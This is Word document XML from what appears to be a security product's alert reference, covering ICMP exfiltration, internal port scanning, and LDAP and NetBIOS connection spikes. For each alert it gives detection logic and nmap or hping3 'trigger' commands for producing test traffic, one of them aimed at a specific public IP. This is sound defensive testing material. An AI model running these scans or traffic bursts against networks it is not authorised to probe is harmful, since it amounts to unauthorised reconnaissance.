    <w:p w14:paraId="6126C730" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B46BA2" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F91EE9B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exfiltration Over Alternative Protocol (T1048), Network Denial of Service (T1464)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7B9876" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is disabled by default. Toggle the “Enabled” switch to turn it on in Alert settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C94ACC7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install hping3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB513D4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo hping3 --icmp 17.253.7.206 -d 600 -c 101 –faster</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C67512" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F861132" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Internal Port Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554EAD50" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device has started a port scan on a device internal to your network. This may indicate that an attacker is scanning for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465BC388" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Internal Port Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496920B5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 7 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61189399" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E3383E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F145F7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery (T1046)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2415EB59" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default. The subnet used in the trigger command must be the </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the subnet for the host running the command. An example is provided here, but you will likely need to change the subnet when you run the trigger command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F28E45" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48DE36" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap 192.168.1.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19817BE3" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="177A64C5" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LDAP Connection Spike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D78A0F9" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device attempted to contact an unusually large number of internal LDAP servers. This can be an indication of malware or abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C44E45" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FB706E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3914EAC0" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727EA9D4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discovery (TA0007), Lateral Movement (TA0008), Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0046214E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery (T1046), Domain Account (T1087.002)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D786768" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F23D1DB" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3694F4" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sT -p 389 -Pn 192.168.3.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FD18AD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CA87BFE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NetBIOS Connection Spike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A97C45" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device attempted to contact large number of hosts using NetBIOS. This can be an indication of malware or abuse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F111100" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5EDBD" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>History:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9 days</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E431B" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Telemetry:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> NetFlow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA11550" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Tactic: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BB61E0" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Technique:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Network Service Discovery (T1046)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA6909D" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Special Considerations:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> This alert is enabled by default.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D06A065" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparation Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo apt update; sudo apt -y install nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243EF7F" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Trigger Command:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap -sT -p 139 -Pn 192.168.4.0/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1347CCCE" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4488C35E" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>New IP Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBBC065" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Description:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Device started scanning the local IP network. This may indicate that an attacker is inside the network, scanning for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D0B4F7" w14:textId="77777777" w:rsidR="000D61E6" w:rsidRPr="000D61E6" w:rsidRDefault="000D61E6" w:rsidP="000D61E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Observation Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="000D61E6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IP Scanner</w:t>
